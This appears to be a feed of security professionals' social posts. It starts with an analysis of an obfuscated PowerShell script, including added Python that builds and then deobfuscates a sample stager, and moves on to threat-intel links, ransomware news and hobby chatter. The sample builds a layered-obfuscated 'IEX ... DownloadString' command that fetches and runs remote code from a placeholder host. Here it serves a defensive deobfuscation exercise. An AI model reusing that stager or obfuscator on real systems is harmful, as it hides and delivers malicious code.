Found an interesting PowerShell script today. It's obfuscated using a somewhat novel combination of a useless while loop, character substitution, decimal encoding, and a single-byte XOR.
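The layering described in the post (character substitution, decimal encoding, single-byte XOR, and a loop that only runs once) is easy to strip once you know the order the layers were applied in. The Python below is an added example, not the script from the post or any code of its author: it builds a constructed PowerShell stager in that style with an assumed key (0x5A) and an assumed substitution table, then recovers the command by pulling out the decimal blob and the `.Replace()` chain, and brute-forcing the XOR key rather than trusting the literal in the script (an operator can change that literal without changing the blob, so the brute-force path covers the general case).

```python
import re
import string

# Constructed sample (not the script from the post): the real command is
# character-substituted, XOR'd with one byte and emitted as a comma-separated
# decimal list inside a while loop that runs exactly once.  KEY and SUBST are
# assumptions made for this example.
PLAINTEXT = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/p.ps1')"
KEY = 0x5A
SUBST = {"e": "@", "t": "#"}   # applied before the XOR, undone by a .Replace() chain


def obfuscate(plain, key, subst):
    """Emit a PowerShell stager in the layered style described in the post."""
    for orig, fake in subst.items():
        plain = plain.replace(orig, fake)
    nums = ",".join(str(ord(c) ^ key) for c in plain)
    undo = "".join(".Replace('%s','%s')" % (fake, orig) for orig, fake in subst.items())
    return (
        "$i=0;while($i -lt 1){\n"
        "  $d='%s';\n"
        "  $s=-join($d.Split(',')|%%{[char]([int]$_ -bxor 0x%02X)});\n"
        "  IEX $s%s;\n"
        "  $i++\n"
        "}\n" % (nums, key, undo)
    )


DECIMAL_LIST = re.compile(r"'((?:\d{1,3},)+\d{1,3})'")
XOR_KEY = re.compile(r"-bxor\s+(0x[0-9a-fA-F]+|\d+)")
REPLACE_CHAIN = re.compile(r"\.Replace\('([^']*)','([^']*)'\)")
# Strings a decoded PowerShell downloader is likely to contain; used to rank keys.
KEYWORDS = ("IEX", "Invoke-Expression", "New-Object", "DownloadString",
            "FromBase64String", "http")


def extract_layers(script):
    """Return the decimal-encoded bytes and the (from, to) pairs of the Replace chain."""
    m = DECIMAL_LIST.search(script)
    if not m:
        raise ValueError("no decimal-encoded blob found")
    data = bytes(int(n) for n in m.group(1).split(","))
    return data, REPLACE_CHAIN.findall(script)


def undo_substitution(text, replaces):
    # PowerShell's .Replace(a, b) turns a into b; apply the chain in script order.
    for fake, orig in replaces:
        text = text.replace(fake, orig)
    return text


def score(text):
    # Any non-printable byte rules the key out; otherwise count keyword hits.
    if any(c not in string.printable for c in text):
        return -1
    return sum(text.count(k) for k in KEYWORDS)


def brute_force_xor(data, replaces):
    """Try all 256 keys; return (score, key, text) for the best-looking decode."""
    best = (-1, None, "")
    for key in range(256):
        text = undo_substitution("".join(chr(b ^ key) for b in data), replaces)
        s = score(text)
        if s > best[0]:
            best = (s, key, text)
    return best


def deobfuscate(script):
    """Recover (key, command). Uses the script's stated key only if it decodes sensibly."""
    data, replaces = extract_layers(script)
    stated = XOR_KEY.search(script)
    if stated:
        key = int(stated.group(1), 0)
        text = undo_substitution("".join(chr(b ^ key) for b in data), replaces)
        if score(text) > 0:
            return key, text
    _, key, text = brute_force_xor(data, replaces)
    return key, text


if __name__ == "__main__":
    sample = obfuscate(PLAINTEXT, KEY, SUBST)
    print(sample)
    print(deobfuscate(sample))
```

The `while($i -lt 1)` wrapper needs no handling at all; it exists to defeat naive signature matching on the decode line, not to change the data, which is why the extraction works on the blob and the `.Replace()` chain alone.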
Hunter of threats as yet undetected.
Couple of people asked about our API: Yes, we do have an API. Yes, it sometimes works. Yes, you may use it responsibly. Yes, the documentation is somewhat complete and accurate. Enough to make worthwhile reading, and I just updated/clarified some of the rules. See https://isc.sans.edu/api/
@GossiTheDog and you randomly have your budget modified for no reason and logs slashed to save cash lolololololz
Can I play with magnets!
@NatlSecCnslrs agreed
This is a very detailed analysis on the #SharpPanda #APT group's use of the #Soul #malware framework, used to recently target Southeast Asian government entities.
#DFIR
Check Point Report: https://research.checkpoint.com/2023/pandas-with-a-soul-chinese-espionage-attacks-against-southeast-asian-government-entities/
Yesterday I forgot "responsible" in responsible disclosure and called it honourable disclosure, this need to become a thing. #ResponsibleDisclosure #HonourableDisclosure
I would like to request an 8.0085% pay rise now with a further 7.175% in 6 months!
For the humour impaired, please see PornHub or move on.
The IP where this domain is located is apparently 47.99.90[.]125, which DomainTools says is China Hangzhou Aliyun Computing Co Ltd -- Alibaba's network. There were no malicious detections on this domain or IP from Virustotal.
I would highly recommend Okta customers enable Number Challenge via Okta support on their accounts (similar to Number Matching in Azure MFA, see also LAPSUS$, NewGen, WorstGen, SS etc attacks). https://support.okta.com/help/s/article/Number-Challenge-for-Okta-Verify?language=en_US
Bam, lets take this up a notch!
Highlights of the past 3 weeks work. That is the total time I have been dabbling in Warhammer. Add in a couple squads of Assault Intercessors, a squad of devastated and 3 lone test cases to accompany the big shots here. Onwards to a 2000pt army of White Scars, competition, and fun.
An evening learning to play Warhammer
Trying to work out what sort of decision was made here?!?
Your annual reminder that your monthly metrics will be down 10% in February because February is 10% shorter than January. Please do not contact your data team about it.
After an absolute disaster painting I decided to assemble some scenery. Easier to empty an ADHD brain when you have a hands debuff (they are doing stuff that requires no brain power)
I obviously don't have my tweet thread any more to add to it, but somebody is doing automated destructive attacks on VMware ESXi with 2021 vulns. At the time, to their credit, VMware were very clear in customer comms that not patching could lead to ransomware. #ESXiArgs https://www.bleepingcomputer.com/news/security/massive-esxiargs-ransomware-attack-targets-vmware-esxi-servers-worldwide/
The LockBit ransomware gang claims ION Trading UK paid a ransom after the group's cyberattack on the software firm upended derivatives trading around the world (Bloomberg)
https://www.bloomberg.com/news/articles/2023-02-03/ion-removed-from-hacker-s-target-list-deadline-for-ransom-suspended
http://www.techmeme.com/230204/p3#a230204p3
Theme song for today, because I didn't properly clean out my bag after BSidesLondon.